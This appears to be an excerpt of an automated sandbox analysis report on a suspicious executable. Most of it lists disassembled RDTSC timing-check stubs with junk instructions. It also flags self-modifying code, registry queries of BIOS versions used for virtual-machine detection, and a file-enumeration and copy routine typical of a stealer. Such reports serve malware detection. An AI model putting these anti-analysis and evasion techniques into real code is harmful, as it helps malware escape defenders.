                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B2A73 second address: 10B2A79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B27CF second address: 10B27D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B2A79 second address: 10B2A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B2A7D second address: 10B2A95 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F86385196D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jnl 00007F86385196D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5BAC second address: 10B5BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5F16 second address: 10B5F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5F1C second address: 10B5F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F863914EA28h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 call 00007F863914EA2Dh 0x00000028 add ecx, 313EBCA1h 0x0000002e pop edx 0x0000002f push 0000001Eh 0x00000031 mov dword ptr [ebp+122D1D81h], ebx 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push ebx 0x0000003d pop ebx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5F64 second address: 10B5F6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5F6A second address: 10B5F74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F863914EA26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5F74 second address: 10B5F78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5F78 second address: 10B5FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F863914EA35h 0x0000000f pushad 0x00000010 jc 00007F863914EA26h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B6239 second address: 10B6241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F72F5 second address: 10F72FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F72FB second address: 10F7305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F75D7 second address: 10F75DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F75DF second address: 10F75E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F75E3 second address: 10F7607 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F863914EA26h 0x00000008 jmp 00007F863914EA37h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F7607 second address: 10F762D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F86385196E6h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F762D second address: 10F7631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F7B95 second address: 10F7B9B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F7B9B second address: 10F7BBF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F863914EA3Bh 0x00000008 jmp 00007F863914EA35h 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FD7E7 second address: 10FD7ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FD02D second address: 10FD04E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F863914EA32h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F863914EA2Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FD04E second address: 10FD052 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FD052 second address: 10FD058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FD058 second address: 10FD064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FD4F4 second address: 10FD4FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FD4FA second address: 10FD4FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1102082 second address: 110209D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F863914EA36h 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110209D second address: 11020A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11021FC second address: 1102203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1106823 second address: 1106827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1106827 second address: 1106840 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F863914EA2Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1106840 second address: 1106846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1106846 second address: 110684A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1105EE6 second address: 1105EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1105EEC second address: 1105EFC instructions: 0x00000000 rdtsc 0x00000002 jg 00007F863914EA26h 0x00000008 jns 00007F863914EA26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1105EFC second address: 1105F02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1105F02 second address: 1105F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11061E2 second address: 11061F1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F86385196D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11061F1 second address: 11061FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110651A second address: 110651E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110651E second address: 110652C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F863914EA28h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110652C second address: 1106531 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073336 second address: 107333C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107333C second address: 107334F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F86385196D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F86385196D6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107334F second address: 1073359 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F863914EA26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B085 second address: 110B08B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B08B second address: 110B091 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B091 second address: 110B0AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F86385196E7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B1EE second address: 110B1F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B1F2 second address: 110B1FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B1FD second address: 110B203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B367 second address: 110B373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B4B2 second address: 110B4B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B4B6 second address: 110B4BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B5EE second address: 110B5F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5D93 second address: 10B5DF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86385196DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a and cl, FFFFFF8Dh 0x0000000d mov ecx, dword ptr [ebp+122D1C75h] 0x00000013 mov ebx, dword ptr [ebp+12486EEDh] 0x00000019 push ecx 0x0000001a xor dword ptr [ebp+122D1B2Ch], eax 0x00000020 pop ecx 0x00000021 add eax, ebx 0x00000023 push 00000000h 0x00000025 push esi 0x00000026 call 00007F86385196D8h 0x0000002b pop esi 0x0000002c mov dword ptr [esp+04h], esi 0x00000030 add dword ptr [esp+04h], 00000016h 0x00000038 inc esi 0x00000039 push esi 0x0000003a ret 0x0000003b pop esi 0x0000003c ret 0x0000003d jmp 00007F86385196DCh 0x00000042 push esi 0x00000043 mov dh, al 0x00000045 pop edx 0x00000046 nop 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a jc 00007F86385196D6h 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B8A6 second address: 110B8AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B8AE second address: 110B8B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B8B4 second address: 110B8D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ecx 0x00000010 push esi 0x00000011 jc 00007F863914EA26h 0x00000017 js 00007F863914EA26h 0x0000001d pop esi 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B8D2 second address: 110B8DD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007F86385196D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110BA23 second address: 110BA36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F863914EA2Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110BA36 second address: 110BA4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jnl 00007F86385196D6h 0x0000000f popad 0x00000010 pushad 0x00000011 jg 00007F86385196D6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11132CC second address: 11132D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F863914EA26h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1113883 second address: 111389E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F86385196DDh 0x0000000d jo 00007F86385196D6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111389E second address: 11138A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11138A2 second address: 11138A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1113E7B second address: 1113E99 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F863914EA26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007F863914EA31h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114DD8 second address: 1114DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114DDE second address: 1114DE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114DE2 second address: 1114DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114DE8 second address: 1114DF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F863914EA2Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114DF7 second address: 1114E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F86385196D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1115082 second address: 1115086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1115086 second address: 111508A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111508A second address: 1115090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1118632 second address: 1118636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1118636 second address: 111863E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111863E second address: 111865C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F86385196E9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11187D8 second address: 11187F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F863914EA2Fh 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111910F second address: 1119119 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F86385196DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A957 second address: 111A95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A95B second address: 111A95F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A95F second address: 111A96B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A96B second address: 111A971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A971 second address: 111A976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A976 second address: 111A97C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A97C second address: 111A982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A982 second address: 111A986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1120EDC second address: 1120EE2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1120EE2 second address: 1120F2A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F86385196D8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F86385196E0h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push ecx 0x00000013 jmp 00007F86385196E2h 0x00000018 pop ecx 0x00000019 pushad 0x0000001a jmp 00007F86385196DCh 0x0000001f je 00007F86385196D6h 0x00000025 push edi 0x00000026 pop edi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112A915 second address: 112A938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F863914EA38h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128AF9 second address: 1128B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F86385196DBh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128B0B second address: 1128B4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F863914EA38h 0x00000007 jc 00007F863914EA26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F863914EA2Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F863914EA33h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128B4E second address: 1128B5E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F86385196D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128B5E second address: 1128B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128B64 second address: 1128B68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: F01933 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 10CDDFD instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_00CB38B0
